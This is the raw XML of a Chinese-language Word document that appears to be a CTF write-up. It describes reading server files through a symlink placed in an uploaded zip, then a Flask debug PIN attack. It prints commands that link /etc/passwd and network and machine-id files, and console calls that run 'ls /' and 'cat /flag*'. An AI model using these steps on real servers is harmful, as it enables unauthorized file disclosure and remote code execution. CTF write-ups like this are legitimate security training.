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C894" w14:textId="77777777" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本题考查：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 软链接读取文件，flask-pin码攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36956A32" w14:textId="7B57030B" w:rsidR="00543168" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:t>upload获得报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541CB568" w14:textId="1BD94939" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3782EB77" wp14:editId="6E32544F">
            <wp:extent cx="5274310" cy="2119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C02F" w14:textId="5940BE17" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B"/>
    <w:p w14:paraId="23C957AB" w14:textId="2EF99BE3" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:t>Ln -s /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE1F5E" w14:textId="62526B91" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:t>Zip -y pass.zip pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF585F3" w14:textId="7DD06DE2" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A93CFB4" w14:textId="7FF69CB6" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:t xml:space="preserve">Ln -s </w:t>
      </w:r>
      <w:r w:rsidRPr="008D6C5B">
        <w:t>/sys/class/net/ens33/address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43941EBB" w14:textId="1031156A" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:t xml:space="preserve">Zip -y </w:t>
      </w:r>
      <w:r>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.zip </w:t>
      </w:r>
      <w:r>
        <w:t>add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460F4D76" w14:textId="55A478EA" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿mac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BF7A4F" w14:textId="7A0A6140" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样访问</w:t>
      </w:r>
      <w:r w:rsidRPr="008D6C5B">
        <w:t>/sys/class/net/eth0/address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="008D6C5B">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D6C5B">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D6C5B">
        <w:t>/machine-id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B41DC05" w14:textId="32279977" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿mac</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34373CCD" w14:textId="46338F9F" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后跑脚本，生成pin码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4319A8C5" w14:textId="1F2B2146" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来就</w:t>
      </w:r>
      <w:r w:rsidR="00762CCB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以用python的shell了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A83EB0" w14:textId="44C88E93" w:rsidR="00762CCB" w:rsidRDefault="00762CCB" w:rsidP="008D6C5B">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mport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14:paraId="5D1282EE" w14:textId="3E9654E9" w:rsidR="00762CCB" w:rsidRDefault="00762CCB" w:rsidP="008D6C5B">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Os.popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(‘ls /’).read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28444424" w14:textId="14632ED5" w:rsidR="00762CCB" w:rsidRPr="00762CCB" w:rsidRDefault="00762CCB" w:rsidP="008D6C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Os.popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(‘cat /flag*’).read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40146C84" w14:textId="77777777" w:rsidR="008D6C5B" w:rsidRPr="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B"/>
    <w:p w14:paraId="287B2452" w14:textId="2C446A88" w:rsidR="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B"/>
    <w:p w14:paraId="28A69F5A" w14:textId="548F80E9" w:rsidR="008D6C5B" w:rsidRPr="008D6C5B" w:rsidRDefault="008D6C5B" w:rsidP="008D6C5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D6C5B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20514B14" wp14:editId="6A052467">
            <wp:extent cx="5274310" cy="1807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5B" w:rsidRPr="008D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35"/>
    <w:rsid w:val="00173735"/>
    <w:rsid w:val="00543168"/>
    <w:rsid w:val="00762CCB"/>
    <w:rsid w:val="008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E564"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{99B7FA77-9008-4FD0-9C8E-848C68B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良光</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>良光</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-30T11:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-30T11:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>